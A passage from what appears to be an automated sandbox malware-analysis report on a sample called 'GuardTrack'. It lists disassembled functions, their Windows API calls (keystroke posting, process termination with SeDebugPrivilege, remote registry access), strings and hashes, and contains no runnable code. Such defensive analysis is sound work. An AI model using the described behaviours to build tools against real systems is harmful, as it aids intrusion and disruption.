Instruction Fuzzy Hash: BF519B30640314BEEF249F28CC89BD97BA6AF06350F245515FA15EB2E1CF71AD90CAE4

Function 005B2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 005EC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005EC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005EC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 005EC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005EC6B1
DestroyIcon.USER32(00000000), ref: 005EC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005EC6DD
DestroyIcon.USER32(?), ref: 005EC6EC

Part of subcall function 0063AAD4: DeleteObject.GDI32(00000000), ref: 0063AB0D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 10eab005c86e13e6a908c0fe22a685c30e7c7d775c22f42dc452472e85a5c7e6
Instruction ID: 28a67405d9632636608870b1c8b658fc545b51dbb89485615ff9426375bddc1d
Opcode Fuzzy Hash: 10eab005c86e13e6a908c0fe22a685c30e7c7d775c22f42dc452472e85a5c7e6
Instruction Fuzzy Hash: F0515974600209AFDB24DF25CC46BAA7FB6FB49750F104528F94697290DB70ED91DB60

Function 0060A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0060B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0060B54D
Part of subcall function 0060B52D: GetCurrentThreadId.KERNEL32 ref: 0060B554
Part of subcall function 0060B52D: AttachThreadInput.USER32(00000000,?,0060A23B,?,00000001), ref: 0060B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0060A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0060A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0060A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0060A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0060A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0060A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0060A2B3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 613568cf635fc77f1f3b481cd64885056a3daeb665c982e8420e7c292ab3bbde
Instruction ID: d84ec247afb8c83afb7b6b74782144b81b73be6c94cbfdbb2fff1e63aecd1ad8
Opcode Fuzzy Hash: 613568cf635fc77f1f3b481cd64885056a3daeb665c982e8420e7c292ab3bbde
Instruction Fuzzy Hash: 2011E575550228BEF7106FA0DC49F6A3B2EDB4D790F111419F3406B0D0CAF35C509AA4

Function 006094D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0060915A,00000B00,?,?), ref: 006094E2
HeapAlloc.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 006094E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0060915A,00000B00,?,?), ref: 006094FE
GetCurrentProcess.KERNEL32(?,00000000,?,0060915A,00000B00,?,?), ref: 00609506
DuplicateHandle.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 00609509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0060915A,00000B00,?,?), ref: 00609519
GetCurrentProcess.KERNEL32(0060915A,00000000,?,0060915A,00000B00,?,?), ref: 00609521
DuplicateHandle.KERNEL32(00000000,?,0060915A,00000B00,?,?), ref: 00609524
CreateThread.KERNEL32(00000000,00000000,0060954A,00000000,00000000,00000000), ref: 0060953E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 859a21309e0c287a6681b69b23de103103cf0d4fea62424cc9c36bdb135be704
Instruction ID: dc703a73feb77491640ada3f29ee39b0ae814e4e3015eb3944bda31349f16ec3
Opcode Fuzzy Hash: 859a21309e0c287a6681b69b23de103103cf0d4fea62424cc9c36bdb135be704
Instruction Fuzzy Hash: 4F01B6B9240308BFF710ABA5DC4DF6B7BADEB8A711F019411FB05DB2A1CA709800CB20

Function 0062A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0062A265
NULL Pointer assignment, xrefs: 0062A28E, 0062A5B2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 2e8f0309e5698ce164190f1007e662b1d59e506f9d13929e863ce54531ab1892
Instruction ID: a710323018a828a4a3a4350a21a2ddcd4f65cf874ddf30de20b45a9a55c57b03
Opcode Fuzzy Hash: 2e8f0309e5698ce164190f1007e662b1d59e506f9d13929e863ce54531ab1892
Instruction Fuzzy Hash: 81C18F71A0062A9FDF14DF98D884AEEB7F6BB48350F148469E905EB280E7B09D458F51

Function 006297FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00629851
VariantInit.OLEAUT32(?), ref: 00629922
VariantInit.OLEAUT32(?), ref: 00629A23
VariantClear.OLEAUT32(?), ref: 00629A2D
VariantClear.OLEAUT32(?), ref: 00629A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00629A06
Null Object assignment in FOR..IN loop, xrefs: 006298B2, 006299E0, 00629A98

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 7df0d6320b67ec0f9830ed97df23492d468ffbdde1a024eaebc81a1bd450c8b3
Instruction ID: 8d341e6e2cc77e2e6340e728625d11a990322533c62aa1d861216823cea18b26
Opcode Fuzzy Hash: 7df0d6320b67ec0f9830ed97df23492d468ffbdde1a024eaebc81a1bd450c8b3
Instruction Fuzzy Hash: 3191AF70A00629ABDF24CFA5D848FEEBBBAEF85710F14855DF515AB240D7709941CFA0

Function 00629E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00607D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?,?,00608073), ref: 00607D45
Part of subcall function 00607D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D60
Part of subcall function 00607D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D6E
Part of subcall function 00607D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?), ref: 00607D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00629EF0
_memset.LIBCMT ref: 00629EFD
_memset.LIBCMT ref: 0062A040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0062A06C
CoTaskMemFree.OLE32(?), ref: 0062A077

Strings

NULL Pointer assignment, xrefs: 0062A0C5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: d18c784a4b296afed73fa69aee7f0c78ab1463613bfd7641868900e18b56353d
Instruction ID: 6eaadd7f826ae7e1ea394e15812b95a617fcbc7cf0a7d8b08ce458a6c7b1f712
Opcode Fuzzy Hash: d18c784a4b296afed73fa69aee7f0c78ab1463613bfd7641868900e18b56353d
Instruction Fuzzy Hash: B2913571D00229ABDB20DFA5D844EDEBBBABF49310F10811AF519A7281DB719A45CFA0

Function 006373A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00637449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0063745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00637477
_wcscat.LIBCMT ref: 006374D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 006374E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00637517

Strings

SysListView32, xrefs: 0063741B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: dafa3401970580e8e2fe89accc52bc2ca62f133d7edc55dd722611a4028a14dc
Instruction ID: 0cd88ab83b61e12647834cd75a678d4bf6b2c93a621fab565df2c8802bff20f6
Opcode Fuzzy Hash: dafa3401970580e8e2fe89accc52bc2ca62f133d7edc55dd722611a4028a14dc
Instruction Fuzzy Hash: 3A41A771904349AFEB319F64CC85BEE7BEAEF48350F10442AFA85E7291D6719D84CB90

Function 0062F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00614148: CreateToolhelp32Snapshot.KERNEL32 ref: 0061416D
Part of subcall function 00614148: Process32FirstW.KERNEL32(00000000,?), ref: 0061417B
Part of subcall function 00614148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00614245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062F08D
GetLastError.KERNEL32 ref: 0062F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 0062F14C
GetLastError.KERNEL32(00000000), ref: 0062F157
CloseHandle.KERNEL32(00000000), ref: 0062F18C

Strings

SeDebugPrivilege, xrefs: 0062F0AB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: f15760bc87cd055a5e15c8f904832da7503ecde11c557b58cac0abf71c103c79
Instruction ID: f726d299116aa2ebd3860090fef740eaf2822a11aa415e3e9e7b01a502e65786
Opcode Fuzzy Hash: f15760bc87cd055a5e15c8f904832da7503ecde11c557b58cac0abf71c103c79
Instruction Fuzzy Hash: B24180312002119FD725EF64DC99FAEB7A6AF84714F08846CF9425B3D2CB74A815CF95

Function 006147E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00614802
LoadStringW.USER32(00000000), ref: 00614809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0061481F
LoadStringW.USER32(00000000), ref: 00614826
_wprintf.LIBCMT ref: 0061484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0061486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00614847

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 69228ea035ad01ec6c5f1b981eafa7b5f04f5186ab9cdb01bb9cd57beb7f5c9f
Instruction ID: 1ade3e06484e8023d36046980c471511ac10461585ae7897f370e2a881ff70f1
Opcode Fuzzy Hash: 69228ea035ad01ec6c5f1b981eafa7b5f04f5186ab9cdb01bb9cd57beb7f5c9f
Instruction Fuzzy Hash: 1D01A2F69002187FF751DBA09D89EF6777EE709301F000196BB0AE3141EA309E848B71

Function 0063DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

GetSystemMetrics.USER32(0000000F), ref: 0063DB42
GetSystemMetrics.USER32(0000000F), ref: 0063DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0063DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0063DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0063DDDC
ShowWindow.USER32(00000003,00000000), ref: 0063DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 0063DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 0063DE43

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 9676bdb853a389ff8616464096649bf2d9450120b19f45010476cfb7f4d1ef01
Instruction ID: 0f5b82072eb8b2a6ecb1126195aa0de8ea82fb93370361128fb29b7d29917d40
Opcode Fuzzy Hash: 9676bdb853a389ff8616464096649bf2d9450120b19f45010476cfb7f4d1ef01
Instruction Fuzzy Hash: 8CB19975A00225EFDF18CF69D9857ED7BB2FF04701F088069ED489E295DB30A990CBA0

Function 00630371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063044E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 8ac6dbc3ea52f13db0f5d48bf62ce129abb99eba298988d7da38aa33666140e2
Instruction ID: bac28585be98452f9e3814ce46fa19ab75a5789e135adcebbd576c7e6d5abb23
Opcode Fuzzy Hash: 8ac6dbc3ea52f13db0f5d48bf62ce129abb99eba298988d7da38aa33666140e2
Instruction Fuzzy Hash: 57A18C302042029FD710EF64C895F6EBBE6BF85314F14891DF5968B2A2DB31E955CF86

Function 005B2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005B2E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000,000000FF), ref: 005B2EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005EC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005EC5C7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3c79d4834b1f5ac58ca19d2f0ca5fdf5b971ea550b2be6984e808db4d7607fcf
Instruction ID: d795a1894977ea21bd482466432b153eff9500da2703e17cf6b6a2b7e3644e3a
Opcode Fuzzy Hash: 3c79d4834b1f5ac58ca19d2f0ca5fdf5b971ea550b2be6984e808db4d7607fcf
Instruction Fuzzy Hash: 2241DB306046C09AD739472B8DCC7FA7F9ABB86300F14481EE58786660C775F885D731

Function 006367F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00636810
GetDC.USER32(00000000), ref: 00636818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00636823
ReleaseDC.USER32(00000000,00000000), ref: 0063682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0063686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0063687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0063964F,?,?,000000FF,00000000,?,000000FF,?), ref: 006368B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006368D6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 68473936136d80cd05d6669207b33c609688f9f7b8735006ffc07043a4c64305
Instruction ID: 10c0bc61a655cf0c32846b175b1a4224f973eba2f38d24071ae134e9503e6f8a
Opcode Fuzzy Hash: 68473936136d80cd05d6669207b33c609688f9f7b8735006ffc07043a4c64305
Instruction Fuzzy Hash: 83316B76101224BFEB118F50CC8AFEA3BAAEF4A761F044065FF089A291C6759851CBB4

Function 0060C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0060C75D
_memcmp.LIBCMT ref: 0060C77F
_memcmp.LIBCMT ref: 0060C797
_memcmp.LIBCMT ref: 0060C7AA
_memcmp.LIBCMT ref: 0060C7C4
_memcmp.LIBCMT ref: 0060C7D7
_memcmp.LIBCMT ref: 0060C7EF
_memcmp.LIBCMT ref: 0060C80A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 52d125fe49a0acf4730acd845f5b18614938bb7f74cb918bd189780dc216e0d5
Instruction ID: 4ff69ce21e31cb2570f1fd7abb377e2246e0f991367f0bbdb3ea637f8a135bb5
Opcode Fuzzy Hash: 52d125fe49a0acf4730acd845f5b18614938bb7f74cb918bd189780dc216e0d5
Instruction Fuzzy Hash: 0B2107726816167BD31877148F86FEB3B6FEE60764B044222FD02A67C3E710DE11C6A9

Function 0061F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D

_wcstok.LIBCMT ref: 0061F2D7
_wcscpy.LIBCMT ref: 0061F366
_memset.LIBCMT ref: 0061F399

Strings

X, xrefs: 0061F3D6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 68cf10f59fdfb12466e220c4ed78853aeafa456229bb6afc08bf83a1cffae243
Instruction ID: 037700b97007e41987b1e4e87b04651ebb8e30d00950dd94c9c6efc789492c18
Opcode Fuzzy Hash: 68cf10f59fdfb12466e220c4ed78853aeafa456229bb6afc08bf83a1cffae243
Instruction Fuzzy Hash: A4C1AE715047429FC724EF64C889E9ABBE5BF85310F04492DF89A973A2DB30ED45CB86

Function 006271EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006272EB
